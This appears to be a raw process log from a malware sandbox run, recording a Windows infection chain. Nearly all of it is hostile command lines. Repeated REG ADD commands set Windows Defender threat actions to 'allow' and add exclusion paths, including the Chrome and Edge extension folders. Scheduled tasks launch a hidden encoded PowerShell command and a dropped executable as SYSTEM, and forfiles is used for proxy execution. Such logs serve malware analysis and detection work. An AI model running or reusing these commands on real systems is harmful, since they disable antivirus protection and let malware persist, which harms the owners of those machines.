/reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EhcFZyxgIKdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EhcFZyxgIKdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WjjwBKPUbwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WjjwBKPUbwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YFvDcakXU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YFvDcakXU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zkyeWAejRmGXC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zkyeWAejRmGXC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CPUWfhACwAFVvAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CPUWfhACwAFVvAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FfUxHPAyTmCtqMizh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FfUxHPAyTmCtqMizh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\czMOsRWjwZXFHErP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\czMOsRWjwZXFHErP\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EhcFZyxgIKdU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EhcFZyxgIKdU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EhcFZyxgIKdU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WjjwBKPUbwUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WjjwBKPUbwUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YFvDcakXU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YFvDcakXU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zkyeWAejRmGXC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zkyeWAejRmGXC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CPUWfhACwAFVvAVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CPUWfhACwAFVvAVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FfUxHPAyTmCtqMizh /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FfUxHPAyTmCtqMizh /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\czMOsRWjwZXFHErP /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\czMOsRWjwZXFHErP /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gRfzSXUaw" /SC once /ST 09:24:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gRfzSXUaw"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gRfzSXUaw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PhaZdSAoTEvbQMDnk" /SC once /ST 05:50:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe\" j3 /xvHhdidvQ 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "PhaZdSAoTEvbQMDnk"

C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe

C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe j3 /xvHhdidvQ 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4600 -ip 4600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1348

C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe Ao /RQNdidCfpK 385118 /S

C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2756 -ip 2756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 448

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

